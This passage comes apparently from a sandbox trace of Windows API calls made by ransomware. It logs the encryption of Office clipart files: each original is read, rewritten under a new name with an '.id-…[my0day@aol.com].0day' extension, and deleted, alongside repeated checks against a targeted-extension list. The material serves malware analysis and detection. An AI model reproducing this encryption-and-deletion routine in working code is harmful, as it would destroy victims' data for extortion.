dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0269.193] GetLastError () returned 0x0 [0269.193] ReadFile (in: hFile=0x300, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x5b8, lpOverlapped=0x0) returned 1 [0269.195] WriteFile (in: hFile=0x2cc, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x5c0, lpOverlapped=0x0) returned 1 [0269.196] ReadFile (in: hFile=0x300, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0269.196] WriteFile (in: hFile=0x2cc, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.196] SetEndOfFile (hFile=0x2cc) returned 1 [0269.196] CloseHandle (hObject=0x2cc) returned 1 [0269.196] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.196] SetEndOfFile (hFile=0x300) returned 1 [0269.203] CloseHandle (hObject=0x300) returned 1 [0269.203] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0269.228] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf")) returned 1 [0269.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63 [0269.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63 [0269.257] lstrlenW (lpString=".doc") returned 4 [0269.257] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.257] lstrlenW (lpString=".docx") returned 5 [0269.257] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.257] lstrlenW (lpString=".pdf") returned 4 [0269.257] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.257] lstrlenW (lpString=".xls") returned 4 [0269.257] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.259] lstrlenW (lpString=".xlsx") returned 5 [0269.264] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.264] lstrlenW (lpString=".ppt") returned 4 [0269.264] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63 [0269.264] lstrlenW (lpString=".zip") returned 4 [0269.265] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.265] lstrlenW (lpString=".rar") returned 4 [0269.265] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.265] lstrlenW (lpString=".bz2") returned 4 [0269.265] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.265] lstrlenW (lpString=".7z") returned 3 [0269.265] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63 [0269.265] lstrlenW (lpString=".dbf") returned 4 [0269.265] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63 [0269.265] lstrlenW (lpString=".1cd") returned 4 [0269.265] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63 [0269.265] lstrlenW (lpString=".jpg") returned 4 [0269.265] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63 [0269.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63 [0269.265] lstrlenW (lpString=".doc") returned 4 [0269.265] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.265] lstrlenW (lpString=".docx") returned 5 [0269.265] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.265] lstrlenW (lpString=".pdf") returned 4 [0269.265] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.265] lstrlenW (lpString=".xls") returned 4 [0269.265] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.265] lstrlenW (lpString=".xlsx") returned 5 [0269.266] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.266] lstrlenW (lpString=".ppt") returned 4 [0269.266] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63 [0269.266] lstrlenW (lpString=".zip") returned 4 [0269.266] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.266] lstrlenW (lpString=".rar") returned 4 [0269.266] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.266] lstrlenW (lpString=".bz2") returned 4 [0269.266] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.266] lstrlenW (lpString=".7z") returned 3 [0269.266] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63 [0269.266] lstrlenW (lpString=".dbf") returned 4 [0269.266] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63 [0269.266] lstrlenW (lpString=".1cd") returned 4 [0269.266] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63 [0269.266] lstrlenW (lpString=".jpg") returned 4 [0269.266] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.266] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0269.266] lstrlenW (lpString="BL00242_.WMF") returned 12 [0269.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0269.267] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=4024) returned 1 [0269.267] CloseHandle (hObject=0x318) returned 1 [0269.267] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf")) returned 0x20 [0269.267] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.267] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0269.267] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.267] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.267] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0269.267] GetLastError () returned 0x0 [0269.267] ReadFile (in: hFile=0x318, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0xfb8, lpOverlapped=0x0) returned 1 [0269.294] WriteFile (in: hFile=0x354, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xfc0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xfc0, lpOverlapped=0x0) returned 1 [0269.295] ReadFile (in: hFile=0x318, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0269.295] WriteFile (in: hFile=0x354, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.295] SetEndOfFile (hFile=0x354) returned 1 [0269.296] CloseHandle (hObject=0x354) returned 1 [0269.296] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.296] SetEndOfFile (hFile=0x318) returned 1 [0269.298] CloseHandle (hObject=0x318) returned 1 [0269.298] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0269.298] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf")) returned 1 [0269.299] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63 [0269.299] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63 [0269.299] lstrlenW (lpString=".doc") returned 4 [0269.299] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.299] lstrlenW (lpString=".docx") returned 5 [0269.299] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.299] lstrlenW (lpString=".pdf") returned 4 [0269.299] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.299] lstrlenW (lpString=".xls") returned 4 [0269.299] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.299] lstrlenW (lpString=".xlsx") returned 5 [0269.299] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.299] lstrlenW (lpString=".ppt") returned 4 [0269.299] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.299] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63 [0269.299] lstrlenW (lpString=".zip") returned 4 [0269.299] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.299] lstrlenW (lpString=".rar") returned 4 [0269.299] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.299] lstrlenW (lpString=".bz2") returned 4 [0269.299] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.299] lstrlenW (lpString=".7z") returned 3 [0269.299] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.299] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63 [0269.299] lstrlenW (lpString=".dbf") returned 4 [0269.299] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.299] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63 [0269.299] lstrlenW (lpString=".1cd") returned 4 [0269.299] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63 [0269.300] lstrlenW (lpString=".jpg") returned 4 [0269.300] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63 [0269.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63 [0269.300] lstrlenW (lpString=".doc") returned 4 [0269.300] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.300] lstrlenW (lpString=".docx") returned 5 [0269.300] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.300] lstrlenW (lpString=".pdf") returned 4 [0269.300] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.300] lstrlenW (lpString=".xls") returned 4 [0269.300] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.300] lstrlenW (lpString=".xlsx") returned 5 [0269.300] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.300] lstrlenW (lpString=".ppt") returned 4 [0269.300] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63 [0269.300] lstrlenW (lpString=".zip") returned 4 [0269.300] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.300] lstrlenW (lpString=".rar") returned 4 [0269.300] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.300] lstrlenW (lpString=".bz2") returned 4 [0269.300] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.300] lstrlenW (lpString=".7z") returned 3 [0269.300] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63 [0269.300] lstrlenW (lpString=".dbf") returned 4 [0269.300] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63 [0269.300] lstrlenW (lpString=".1cd") returned 4 [0269.300] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63 [0269.301] lstrlenW (lpString=".jpg") returned 4 [0269.301] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.301] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0269.301] lstrlenW (lpString="BL00248_.WMF") returned 12 [0269.301] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0269.301] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1536) returned 1 [0269.301] CloseHandle (hObject=0x318) returned 1 [0269.301] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf")) returned 0x20 [0269.301] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.301] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0269.301] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.302] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.302] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0269.303] GetLastError () returned 0x0 [0269.303] ReadFile (in: hFile=0x318, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x600, lpOverlapped=0x0) returned 1 [0269.322] WriteFile (in: hFile=0x354, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x610, lpOverlapped=0x0) returned 1 [0269.323] ReadFile (in: hFile=0x318, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0269.323] WriteFile (in: hFile=0x354, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.323] SetEndOfFile (hFile=0x354) returned 1 [0269.328] CloseHandle (hObject=0x354) returned 1 [0269.328] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.328] SetEndOfFile (hFile=0x318) returned 1 [0269.334] CloseHandle (hObject=0x318) returned 1 [0269.334] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0269.334] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf")) returned 1 [0269.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63 [0269.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63 [0269.334] lstrlenW (lpString=".doc") returned 4 [0269.334] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.334] lstrlenW (lpString=".docx") returned 5 [0269.334] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.339] lstrlenW (lpString=".pdf") returned 4 [0269.339] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.339] lstrlenW (lpString=".xls") returned 4 [0269.339] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.339] lstrlenW (lpString=".xlsx") returned 5 [0269.339] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.339] lstrlenW (lpString=".ppt") returned 4 [0269.339] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63 [0269.339] lstrlenW (lpString=".zip") returned 4 [0269.339] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.339] lstrlenW (lpString=".rar") returned 4 [0269.340] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.340] lstrlenW (lpString=".bz2") returned 4 [0269.340] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.340] lstrlenW (lpString=".7z") returned 3 [0269.340] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63 [0269.340] lstrlenW (lpString=".dbf") returned 4 [0269.340] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63 [0269.340] lstrlenW (lpString=".1cd") returned 4 [0269.340] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63 [0269.340] lstrlenW (lpString=".jpg") returned 4 [0269.340] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63 [0269.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63 [0269.340] lstrlenW (lpString=".doc") returned 4 [0269.340] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.340] lstrlenW (lpString=".docx") returned 5 [0269.340] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.340] lstrlenW (lpString=".pdf") returned 4 [0269.340] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.340] lstrlenW (lpString=".xls") returned 4 [0269.340] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.340] lstrlenW (lpString=".xlsx") returned 5 [0269.340] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.340] lstrlenW (lpString=".ppt") returned 4 [0269.340] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63 [0269.341] lstrlenW (lpString=".zip") returned 4 [0269.341] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.341] lstrlenW (lpString=".rar") returned 4 [0269.341] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.341] lstrlenW (lpString=".bz2") returned 4 [0269.341] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.341] lstrlenW (lpString=".7z") returned 3 [0269.341] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.341] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63 [0269.341] lstrlenW (lpString=".dbf") returned 4 [0269.341] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.341] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63 [0269.341] lstrlenW (lpString=".1cd") returned 4 [0269.341] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.341] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63 [0269.341] lstrlenW (lpString=".jpg") returned 4 [0269.341] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.341] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0269.341] lstrlenW (lpString="BL00254_.WMF") returned 12 [0269.341] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00254_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0269.342] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1736) returned 1 [0269.342] CloseHandle (hObject=0x318) returned 1 [0269.342] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00254_.wmf")) returned 0x20 [0269.343] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00254_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.343] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00254_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0269.343] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.343] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.343] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00254_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0269.343] GetLastError () returned 0x0 [0269.343] ReadFile (in: hFile=0x318, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x6c8, lpOverlapped=0x0) returned 1 [0269.345] WriteFile (in: hFile=0x354, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x6d0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x6d0, lpOverlapped=0x0) returned 1 [0269.346] ReadFile (in: hFile=0x318, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0269.346] WriteFile (in: 